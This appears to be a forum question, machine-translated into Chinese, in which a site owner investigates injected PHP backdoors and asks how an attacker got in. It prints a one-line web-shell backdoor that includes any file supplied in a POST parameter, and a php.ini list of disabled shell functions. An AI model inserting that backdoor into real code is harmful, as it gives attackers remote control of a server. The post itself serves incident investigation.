【发布时间】:2012-03-07 18:44:42
【问题描述】:
所以我在一个网站上发现了一个注入代码。几个 php 文件前面带有 obfuscated code,其计算结果为 a script,允许访问文件系统中的其他文件并执行终端命令。其他一些页面也注入了这个简单的代码:
<?php
if(isset($_POST{"VXzGE"})) include_once($_POST{"VXzGE"});
我被告知服务器本身没有任何违规行为,所以我能想到的唯一可能发生这种违规行为的方法是通过不安全的形式。假设网站有几种形式:
- 部分表单上传文件
- 数据库中的一些保存信息
- 其他只根据提交的表单内容保存一个cookie
我如何检查注入的来源?
我相信一定有一些常见的方法来做这种事情,它们是什么?
仅供参考,我的服务器通过 php.ini 禁用了这些功能:
disable_functions = "apache_child_terminate, escapeshellarg, escapeshellcmd, exec, fp, fput, highlight_file, passthru, php_uname, popix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, prce, system"
【问题讨论】:
标签: php code-injection